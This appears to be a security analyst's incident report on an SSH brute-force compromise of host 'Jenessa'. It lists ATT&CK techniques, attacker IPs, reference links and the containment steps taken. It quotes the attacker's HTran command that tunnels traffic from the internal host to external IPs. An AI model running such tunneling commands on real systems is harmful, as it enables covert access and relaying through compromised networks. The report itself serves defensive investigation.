T1021 Remote Services
T1110 Brute Force
T1090 Proxy
T1572 Protocol Tunneling
Attacker IP 87.249.134.130 gained access via SSH brute force
Compromised account analyst on host Jenessa 172.16.17.131
External proxy endpoint 218.27.4.98 used for tunneling
HTran proxy tool was executed to create a network tunnel from internal host to external malicious IP
Command used was ./HTran -slave 218.27.4.98 4444 18.189.13.47 80
Tool was compiled on the endpoint and used for proxying traffic
No additional lateral movement or connections observed beyond the tunnel
Initial access occurred shortly before Oct 08 2024 08:26 AM via SSH brute force
HTran execution detected at Oct 08 2024 08:26 AM
Affected host Jenessa 172.16.17.131
Inbound attack from 87.249.134.130
Outbound tunnel established to 218.27.4.98 over port 4444
Summary
Investigation confirmed a true positive alert. Attacker gained access through successful SSH brute force against analyst account. HTran tool was deployed and executed to establish a proxy tunnel to a known malicious IP. No evidence of further persistence or lateral movement was identified.
Response Actions
Removed HTran tool from endpoint
Verified no active malicious processes running
Reset analyst account password
Removed analyst account from sudo group
Confirmed no additional suspicious network activity
Endpoint contained successfully
https://www.abuseipdb.com/check/87.249.134.130
https://www.abuseipdb.com/check/218.27.4.98
https://github.com/HiwinCN/HTran
https://www.virustotal.com/gui/file/34d99b639c4660206a8d034ba52cf6e008ca21abd410f952d24231adb40f49f2/details